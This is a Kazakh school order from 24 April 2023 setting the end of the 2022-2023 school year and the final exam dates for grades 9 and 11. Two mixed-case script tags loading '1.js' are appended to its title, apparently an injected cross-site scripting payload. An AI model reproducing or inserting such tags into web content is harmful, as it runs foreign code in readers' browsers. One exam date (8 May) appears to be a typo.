2022 - 2023 оқу жылын аяқтау және орта білім беретін ұйымдарда оқитын оқушыларға қорытынды аттестаттауды өткізу мерзімін бекіту туралы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

24.04.2023

Қазақстан Республикасы білім Ғылым министірлігінің 2023 жылғы

жылгы 13 сәуірдегі № 172 бұйрығына сәйкес,2022-2023 оқу жылын аяқтау мақсатында және « Білім бөлімі» ММ  2023 жылғы 14 сәуірдегі № 273 бұйрығы негізінде БҰЙЫРАМЫН:

1.Оқу жылын аяқтаудың мынадай мерзімдері бекітілсін:

1)Мектепалды,1-11 сыныптардағы оқу жылының сабақтары 2023 жылдың 31 мамырында аяқталсын.

2) 9 - сынып білім алушыларының қорытынды бітіру емтихандары – 2023 жылғы 2  - 13  маусым аралығында өткізілсін;

3) 11 – сынып  білім алушыларының мемлекеттік бітіру емтихандары – 2023 жылғы 5 – 19 маусым аралығында өткізілсін;

2. Қорытынды  аттестаттауды өткізудің мынадай мерзімдері бекітілсін:

 9 сынып білім алушылары үшін;

1) қазақ/орыс тілі бойынша эссе нысанында жазбаша емтихан,гуманитарлық цикл пәндерін тереңдетіп оқытатын мектептерде-жазбаша жұмыс 2023 жылғы 2 маусым;

2) математика (алгебра)  бойынша жазбаша емтихан (бақылау жұмысы) -2023 жылғы 6 маусым;

3) орыс тілдерінде оқытатын сыныптардағы қазақ тілі мен әдебиет бойынша жазбаша емтихан-2023 жылғы 9 маусым;

4) таңдау пәні (география)  бойынша жазбаша емтихан – 2023 жылғы 13 маусым;

3.11 сынып білім алушылары үшін:

1) қазақ/орыс тілі бойынша жазбаша емтихан 2023 жылғы 5 маусым;

2) алгебра және анализ бастамаларынан жазбаша емтихан – 2023 жылғы 8 мамыр;

3) Қазақстан тарихынан ауызша емтихан  -2023 жылғы 12 маусым;

4) орыс тілдерінде оқытатын мектептерде қазақ тілі және әдебиетінен жазбаша емтихан – 2023 жылғы 15 маусым;

5) таңдау пәні (география) бойынша жазбаша емтихан -2023 жылғы 19 маусым;

4. Мектеп директорының орынбасарлары Матерова Л.П.,Ткачева О.Л.

Қазақстан Республикасы Білім және ғылым министірінің 2008 жылғы 18 наурыздағы №125 бұйрығына сәйкес 2022-2023 оқу жылын аяқтауды қамтамасыз етсін.

5. 2022-2023 оқу жылын ұйымдасқан түрде аяқтау бойынша іс-шаралар жоспары бекітілсін.

6.Осы бұйрықтың орындалуын бақылауды өзіме қалдырамын.

Просмотров: 1320


Пікір қосу



Деректерді қолтаңбаға қосу